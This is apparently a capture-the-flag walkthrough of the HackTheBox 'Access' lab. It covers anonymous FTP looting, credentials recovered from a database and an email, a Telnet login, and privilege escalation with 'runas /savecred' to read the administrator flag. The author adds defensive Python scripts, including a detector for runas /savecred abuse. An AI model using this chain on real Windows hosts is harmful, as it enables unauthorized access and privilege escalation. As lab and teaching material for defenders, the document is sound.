First of all, I should say this machine took me around 6 hours to complete. I fell into a few nasty pitfalls along the way, and the final solution turned out to be much simpler than I had expected.
My first step when starting on a new machine is almost always the same: run an nmap scan to see what is running.
root@localhost:~/hackthebox/access# nmap -p- -sV -O 10.10.10.98
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 06:02 EST
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.02% done
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 16.93% done; ETC: 06:07 (0:04:30 remaining)
Nmap scan report for 10.10.10.98
Host is up (0.13s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (89%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (89%), Microsoft Windows Phone 7.5 or 8.0 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 683.84 seconds
From the output we can see three services: Telnet, HTTP and FTP. HTTP is the easiest to check first, so I browsed to http://10.10.10.98, which shows a page containing an image called out.jpg, a camera view of a server room, with the text LON-MC6 above it. Viewing the source, there is nothing hidden on the page.
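As an added defensive example (my own code, not part of the original writeup), the following Python script parses the port table of an nmap -sV report like the one above and flags open services that carry credentials in the clear, which is exactly the situation this box is in with FTP, Telnet and plain HTTP all exposed. The report embedded in it is a constructed sample modelled on the scan, not the page's exact output.

```python
import re

# Constructed sample: the port table of an `nmap -sV` report, modelled on the
# scan in this writeup (with a TLS service and a filtered port added for contrast).
SAMPLE_NMAP = """\
PORT     STATE    SERVICE  VERSION
21/tcp   open     ftp      Microsoft ftpd
23/tcp   open     telnet?
80/tcp   open     http     Microsoft IIS httpd 7.5
443/tcp  open     ssl/http Microsoft IIS httpd 7.5
3389/tcp filtered ms-wbt-server
"""

# Services that transmit credentials or content without encryption, mapped to
# the encrypted alternative an administrator should migrate to.
CLEARTEXT_SERVICES = {
    "ftp": "SFTP or FTPS (FTP over TLS)",
    "telnet": "SSH, or WinRM over HTTPS on Windows",
    "http": "HTTPS",
}

# port/proto, state, service name, optional version text
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_port_table(report):
    """Return one dict per port line of an nmap report (other lines are skipped)."""
    rows = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        rows.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            # nmap appends '?' when the service guess was not confirmed ("telnet?")
            "service": service.rstrip("?"),
            "unconfirmed": service.endswith("?"),
            "version": (version or "").strip(),
        })
    return rows


def cleartext_findings(rows):
    """List (port, service, recommended replacement) for open cleartext services."""
    findings = []
    for row in rows:
        if row["state"] == "open" and row["service"] in CLEARTEXT_SERVICES:
            findings.append((row["port"], row["service"], CLEARTEXT_SERVICES[row["service"]]))
    return findings


def report(rows):
    """Human-readable summary of the cleartext exposure."""
    lines = [f"{len(rows)} port lines parsed"]
    for port, service, fix in cleartext_findings(rows):
        lines.append(f"port {port}: {service} sends credentials in the clear; prefer {fix}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(parse_port_table(SAMPLE_NMAP)))
```

Run it against the saved output of a real scan of your own hosts (nmap -sV ... -oN report.txt) and every line in the findings is a service where a credential typed by a user or an engineer crosses the network readable, which is how both the FTP download and the Telnet login later in this writeup work.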
<html>
<head>
<title>MegaCorp</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="center">
<p><strong><font size="5" face="Verdana, Arial, Helvetica, sans-serif">LON-MC6</font></strong></p>
<p><img border="0" src="out.jpg"></p>
</div>
</body>
</html>
Since this didn't seem to lead anywhere for now, I next decided to check the FTP service by connecting to it with ncftp:
root@localhost:~# ncftp 10.10.10.98
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Copyright (c) 1992-2011 by Mike Gleason.
All rights reserved.
Connecting to 10.10.10.98...
Microsoft FTP Service
Logging in...
User logged in.
Logged in to 10.10.10.98.
ncftp / > dir
connect failed: Connection refused.
connect failed: Connection refused.
connect failed: Connection refused.
Falling back to PORT instead of PASV mode.
List failed.
ncftp / > dir
d--------- 1 ftpuser ftpusers 0 Aug 23 2018 Backups
d--------- 1 ftpuser ftpusers 0 Aug 24 2018 Engineer
ncftp / > cd Backups
ncftp /Backups > dir
---------- 1 ftpuser ftpusers 5652480 Aug 23 2018 backup.mdb
ncftp /Backups > get backup.mdb
backup.mdb: 5.39 MB 76.00 kB/s
ncftp /Backups > cd ..
ncftp / > cd Engineer
ncftp /Engineer > dir
---------- 1 ftpuser ftpusers 10870 Aug 24 2018 Access Control.zip
ncftp /Engineer > get "Access Control.zip"
Access Control.zip: 10.62 kB 3.66 kB/s
ncftp /Engineer >
The FTP service accepts guest (anonymous) logins, since it never prompts for a password. It contains two directories called Backups and Engineer: Backups holds a backup.mdb file and Engineer holds Access Control.zip. I initially tried to do this with the standard ftp command rather than ncftp, but for some reason it would not download backup.mdb correctly and the file came out corrupted. For that reason I switched to ncftp, which worked fine. I then tried to unzip Access Control.zip, but it was password protected.
root@localhost:~# 7z e Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU L5520 @ 2.27GHz (106A4),ASM)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
ERROR: Wrong password : Access Control.pst
Sub items Errors: 1
Archives with Errors: 1
Sub items Errors: 1
root@localhost:~#
I then copied backup.mdb to my Windows machine and opened it with a free tool called MDB Viewer. The file contains many tables, which I searched through. The one that looked important is called auth_user, and it holds three username/password combinations. I tried each of the passwords on Access Control.zip, and the password access4u@security unzipped it and extracted the PST file inside.
A PST file is the storage file for an Exchange mailbox. I imported the PST into Thunderbird, which let me read the emails it contained.
From "[email protected]" Thu Aug 23 23:44:07 2018
Status: RO
From: [email protected]
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-1048588502_-_-"
----boundary-LibPST-iamunique-1048588502_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-1048588502_-_-"
--alt---boundary-LibPST-iamunique-1048588502_-_-
Content-Type: text/plain; charset="utf-8"
Hi there,
The password for the "security" account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
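The email above is the classic failure of sending a password in plaintext mail, where it then sits in a PST backup on an anonymous FTP share. As an added defensive example (my own code, not from the writeup), here is a small Python scanner in the style of a DLP check: it parses an exported message with the standard library's email module, looks for "the password for X has been changed to Y" phrasing in the plain-text body, and reports a masked finding so the report itself does not leak the secret. The two messages embedded in it are constructed samples with placeholder addresses and a placeholder credential, not the real values from the box.

```python
import re
from email import message_from_string
from email.policy import default as default_policy

# Constructed sample in the shape of the PST export above; addresses and the
# credential are placeholders, not the values from the box.
SAMPLE_EMAIL = """\
From: john@example.com
To: security@example.com
Subject: MegaCorp Access Control System "security" account
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="alt-boundary"

--alt-boundary
Content-Type: text/plain; charset="utf-8"

Hi there,

The password for the "security" account has been changed to Placeh0lder-Secret. Please ensure this is passed on to your engineers.

Regards,
John
--alt-boundary
Content-Type: text/html; charset="utf-8"

<p>Hi there,</p><p>The password for the "security" account has been changed to Placeh0lder-Secret.</p>
--alt-boundary--
"""

# Constructed benign message: talks about passwords without disclosing one.
BENIGN_EMAIL = """\
From: it@example.com
To: all@example.com
Subject: Password policy reminder

Please change your password at the next login. The password policy requires 12 characters.
"""

# Matches "password [for <account>] is|has been changed/set/reset to|: <value>"
DISCLOSURE = re.compile(
    r"password\s+(?:for\s+(?P<account>.+?)\s+)?"
    r"(?:is\b|has been (?:changed|set|reset) to|:)\s*[\"']?(?P<secret>\S+)",
    re.IGNORECASE,
)


def plain_text_parts(msg):
    """Yield the decoded text/plain bodies of a (possibly multipart) message.
    The HTML alternative is skipped so each disclosure is counted once."""
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            yield part.get_content()


def mask(secret):
    """Keep only the first two characters so the finding itself is not a leak."""
    return secret[:2] + "*" * (len(secret) - 2)


def scan_message(raw):
    """Return one finding per credential disclosed in the plain-text body."""
    msg = message_from_string(raw, policy=default_policy)
    findings = []
    for body in plain_text_parts(msg):
        for m in DISCLOSURE.finditer(body):
            secret = m.group("secret").rstrip(".,;")
            findings.append({
                "subject": msg["subject"],
                "account": (m.group("account") or "").strip(),
                "masked": mask(secret),
            })
    return findings


if __name__ == "__main__":
    for raw in (SAMPLE_EMAIL, BENIGN_EMAIL):
        print(scan_message(raw) or "no disclosure")
```

Point it at the .eml files Thunderbird (or readpst) writes out of a PST, and anything it flags is a credential that has to be rotated, because the mailbox, its backups and every mail relay in between have already seen it.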
My next step was to check the last service nmap found, Telnet, by connecting with the credentials provided in the email.
ec2-user@kali:~/Documents/access$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
The user flag is stored in c:\Users\security\Desktop\user.txt and the root flag in c:\Users\Administrator\Desktop\root.txt. So I changed directory to the Desktop and printed the contents of user.txt to the command line.
C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 9C45-DBF0
Directory of C:\Users\security\Desktop
08/28/2018 06:51 AM .
08/28/2018 06:51 AM ..
08/21/2018 10:37 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 16,768,454,656 bytes free
C:\Users\security\Desktop>type user.txt
{
{
REDACTED}}
C:\Users\security\Desktop>
So we now have the user flag. The next step is to get the root flag, and this is where I spent most of my time. I spent ages trying to upload and run a shell and trying to escalate privileges through the ZKAccess3.5 program, but none of these worked. The method that finally worked was the runas command, which lets you run something from the command line as another user. So what I essentially wanted to do was run the command "type c:\Users\Administrator\Desktop\root.txt" as the administrator. I initially tried running runas /user:administrator "type c:\Users\Administrator\Desktop\root.txt" directly. The problem with this is that runas spawns a second window to run the command and print its output, so you never see the output in your own window.
C:\Users\security>runas /user:administrator "type c:\Users\Administrator\Desktop\root.txt""
Enter the password for administrator:
I tried entering the other passwords found in backup.mdb, but none of them worked. What I did find is an option of the runas command that lets it use credentials saved for a user. So if the administrator account's credentials are saved in Windows, commands can be run as administrator without entering the password manually. This is done with the /savecred switch. When I ran it again with that switch, the output that should have been the contents of root.txt (the root flag) was still blank. This is because the command runs in a separate window outside the telnet session. After a lot of guessing and fiddling, I found that the following command worked: it let me run the command I wanted with its output redirected to a txt file, which I could then view in the current session.
C:\Users\security>runas /savecred /user:administrator "cmd /k type c:\Users\Administrator\Desktop\root.txt > c:\Users\security\bbdd.txt"
C:\Users\security>type bbdd.txt
{
{
REDACTED}}
As you can see, this succeeded and I was able to execute a command as administrator and read the contents of root.txt.
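From the defender's side, the whole escalation rests on one misconfiguration: an Administrator credential stored in Credential Manager on a host where a low-privileged user can get a shell. As an added example (my own code, not part of the writeup), the Python below shows the two checks I would put in place for it. The first runs over Windows Security 4688 process-creation events (with command-line auditing enabled) and flags runas invocations that use /savecred together with the target account; the second parses the text of cmdkey /list and reports any stored credential belonging to a privileged account. The events and the cmdkey listing embedded here are constructed samples modelled on this session, not real telemetry, and the field names are those of the 4688 event (SubjectUserName, NewProcessName, CommandLine).

```python
import re

# Constructed Windows Security 4688 events, shaped like a SIEM export and
# modelled on the session in this writeup; not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "security",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
    {"EventID": 4688, "SubjectUserName": "security",
     "NewProcessName": r"C:\Windows\System32\runas.exe",
     "CommandLine": r'runas /savecred /user:administrator "cmd /k type c:\Users\Administrator\Desktop\root.txt > c:\Users\security\out.txt"'},
    {"EventID": 4688, "SubjectUserName": "administrator",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /k type c:\Users\Administrator\Desktop\root.txt > c:\Users\security\out.txt"},
]

# Constructed text in the shape of `cmdkey /list` output on the host; the
# first entry is the condition that makes /savecred work.
SAMPLE_CMDKEY = r"""
Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

    Target: LegacyGeneric:target=fileserver01
    Type: Generic
    User: ACCESS\security
"""

# Accounts whose stored credentials should never exist on a shared host.
PRIVILEGED_ACCOUNTS = {"administrator"}


def runas_savecred_events(events):
    """Flag process creations where runas.exe was started with /savecred."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        cmd = ev.get("CommandLine", "")
        is_runas = ev.get("NewProcessName", "").lower().endswith("\\runas.exe")
        if is_runas and re.search(r"/savecred\b", cmd, re.IGNORECASE):
            target = re.search(r"/user:(\S+)", cmd, re.IGNORECASE)
            hits.append({
                "caller": ev.get("SubjectUserName", "?"),
                "target_user": target.group(1) if target else "?",
                "command": cmd,
            })
    return hits


def saved_credential_entries(cmdkey_output):
    """Parse `cmdkey /list` text into (target, type, user) tuples."""
    entries, block = [], {}
    for line in cmdkey_output.splitlines():
        m = re.match(r"\s*(Target|Type|User):\s*(.*)$", line)
        if not m:
            continue
        block[m.group(1)] = m.group(2).strip()
        if m.group(1) == "User":  # User is the last line of each entry
            entries.append((block.get("Target", ""), block.get("Type", ""), block["User"]))
            block = {}
    return entries


def privileged_saved_credentials(cmdkey_output):
    """Stored credentials for privileged accounts: each one lets any session
    on the host run commands as that account via runas /savecred."""
    risky = []
    for target, kind, user in saved_credential_entries(cmdkey_output):
        account = user.split("\\")[-1].lower()
        if account in PRIVILEGED_ACCOUNTS:
            risky.append({"target": target, "type": kind, "user": user})
    return risky


if __name__ == "__main__":
    for hit in runas_savecred_events(SAMPLE_EVENTS):
        print(f"ALERT {hit['caller']} -> {hit['target_user']}: {hit['command']}")
    for entry in privileged_saved_credentials(SAMPLE_CMDKEY):
        print(f"RISK stored credential for {entry['user']} ({entry['target']})")
```

Any entry the second check reports should be removed with cmdkey /delete (using the target name exactly as the listing shows it), and the Group Policy security option "Network access: Do not allow storage of passwords and credentials for network authentication" stops Credential Manager from keeping such credentials at all. The first check is the detection to run while that clean-up is pending: a non-administrative account calling runas /savecred against an administrator is the signal this writeup relies on.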
Follow: Hunter Cybersecurity, for more information
Website: bbs.kylzrv.com
CTF team: Hunter Cybersecurity
Article: Xtrato
Layout: Hunter-Anonymous